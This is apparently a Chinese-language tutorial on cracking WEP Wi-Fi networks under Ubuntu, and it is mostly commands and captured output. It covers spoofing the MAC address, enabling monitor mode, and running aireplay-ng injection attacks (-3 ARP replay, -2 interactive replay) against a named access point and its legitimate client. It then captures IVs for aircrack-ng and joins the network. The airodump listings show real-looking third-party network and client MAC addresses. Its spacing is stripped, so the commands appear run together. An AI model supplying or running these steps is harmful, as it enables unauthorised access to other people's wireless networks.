详解Ubuntu无线破解流程

详解Ubuntu无线破解流程破解安装和使用大致流程如下sudoapt-getinstalllibnl-devlibssl-devlibertaswget注意一定要下载最新的包#我这里只是演示而已sudocpcompat-wireless-2009-04-16.tar.bz2/usr/src#把包移到/usr/srcsudotarxfcompat-wireless-2009-04-16.tar.bz2#解压cdcompat-wireless-2009-04-16.tar.bz2#编译前记得开无线开关sudomake#编译sudomakeinstall#编译安装sudormmodiwlagniwlcore#暂时卸载驱动sudomakeload#加载新的无线驱动,不行就重启一下#如果出现下面的Unloadingmac80211...FATAL:Modulemac80211isinuse.Unloadingcfg80211...FATAL:Modulecfg80211isinuse.make:***[unload]Error1就是没暂时卸载驱动，执行sudormmodiwlagniwlcore#sudomakeuninstall&&sudoreboot#卸载新的无线驱动并重启使用我就以4965卡为例子#下面是改变mac地址ifconfigwlan0downmacchanger-m00:11:22:33:44:55wlan0ifconfigwlan0up#下面开始使用sudoifconfigwlan0up#启用wlan0接口sudoairmon-ngstartwlan0#开mon0注入接口#出现monitormodeenabledonmon0就正常sudoaireplay-ng-9mon0#测试是否能注入#正常就出现Injectionisworking!#不然就NoAnswer...#可以用sudoiwconfigwlan0channel6来转到第6频道,6就是频道，你可以换11或1#改变后sudoaireplay-ng-9mon0再次测试#开始破解,具体可以参考中卫的BT3破解无线WEP和WPA增加版教程.pdf我就用4965比较支持的aireplay-ng参数-0-1-2-3来说明一下记得，ubuntu8.10后抓包和注入都用mon0(mon系列的接口)-3有客户端airodump-ng-wtest--ivs-c6mon0#用mon0接口来抓取频道6的ivs(破解wep用的包)名字是test#出现的一堆东西.现在就是抓包破解了，最基本的，如果你有时间，你就可以等，等它的data足够到支持破解为止#下面介绍下airodump-ng出现的数据BSSIDPWRRXQBeacons#Data,#/sCHMBENCCIPHERAUTHES00:19:E0:94:07:301630900654.WPA2CCMPPSKh#00:19:E0:94:07:30就是AP的macData就是wep破解需要的包data多到一定程度就可以用aircrack-ng破解#ENC对应的是加密方式，好像上面那行的话就是wpa2,是不能这个抓包的方式破解的要wep才可以00:1D:0F:7C:19:5E16701500554.WPA2CCMPPSK200:21:27:81:66:E616404370654.WEPWEP100:21:27:61:38:861660941454.WPA2CCMPPSK200:21:27:1B:B1:F816301630654.WPA2CCMPPSK?00:1D:0F:43:46:54179558295654.WEPWEPOPNS00:21:27:73:04:C01630400654.WEPWEP600:1D:0F:36:43:0E165547291654.WEPWEP±00:21:27:64:25:4216425200654.WPA2CCMPPSKDBSSIDSTATIONPWRRateLostPacketsProbes00:19:E0:94:07:3000:1C:26:A3:23:B91630-1202huhuusb#上面那行00:19:E0:94:07:30就是ap的mac00:1C:26:A3:23:B9就是它合法的客户端00:21:27:1B:B1:F800:22:5F:16:91:CB1660-2165300:1D:0F:43:46:5400:13:E8:68:A5:CD1640-131200:1D:0F:43:46:5400:13:E8:65:68:9F1650-1204Sky(notassociated)00:1D:E0:6D:CB:071740-101(notassociated)00:13:E8:65:5A:9B1630-101#ok下面来-3(有客户端)注入sudoaireplay-ng-3-b00:19:E0:94:07:30-h00:1C:26:A3:23:B9mon0#成功的话airodump-ng上的对应mac的data就会不断上升就可以用aircrack破解了#-2#sudoaireplay-ng-2-p0841-cff:ff:ff:ff:ff:ff-bapmac-h合法客户端macwifi0sudoaireplay-ng-2-p0841-cff:ff:ff:ff:ff:ff-b00:19:E0:94:07:30-h00:1C:26:A3:23:B9mon0#按y就可以了#其他的我就不演示,大家参考BT3破解无线WEP和WPA增加版教程.pdf接入无线wep1开无线2ifconfigwlan0up#打开接口iwlistscan#扫描无线网络sudoiwconfig#查看无线设置iwconfigwlan0keypasswordapap's_macessidnick_name#例子如下sudoiwconfigwlan0key1234567890essidSkyap00:1D:0F:43:46:54#记得用完上面的那条命令iwconfig查看,essid,AccessPointEncryptionkey一定要有才能接入#很多时候出现AccessPoint:Not-Associated,你就要用sudoiwconfigwlan0apoff/any来尝试#再不行就用ifconfigwlan0up再用iwconfig重新设置sudodhclientwlan0#利用dhcp接入无线接入wpa方法按的blog复制下来，你一般不需要用到ubuntu不能用dhclinetwlan0接入wpa加密的AP我的方法就是利用模拟FAKE注入来接入AP然后用dhclinetwlan0来获得IPFirstofallyoumustknowwpa'sAPpassword,essid,bssid#essidisAP'sMACwpa_passphraseTP-LINKpasswordacc_wpaThenviacc_wpa#addbssidafterssid#examplebssid=00:90:96:00:00:02Atlastsudowpa_supplicant-ctest-Dwired-iwlan0sudoiwconfigwlan0essidTP-LINKkey0123456789ap00:90:96:00:00:02iwconfig#ifitreturnasfollowwlan0IEEE802.11abgnESSID:TP-LINKMode:ManagedFrequency:2.412GHzAccessPoint:00:90:96:00:00:02#Thenyoucanaccesswpa'sAPdhclientwlan0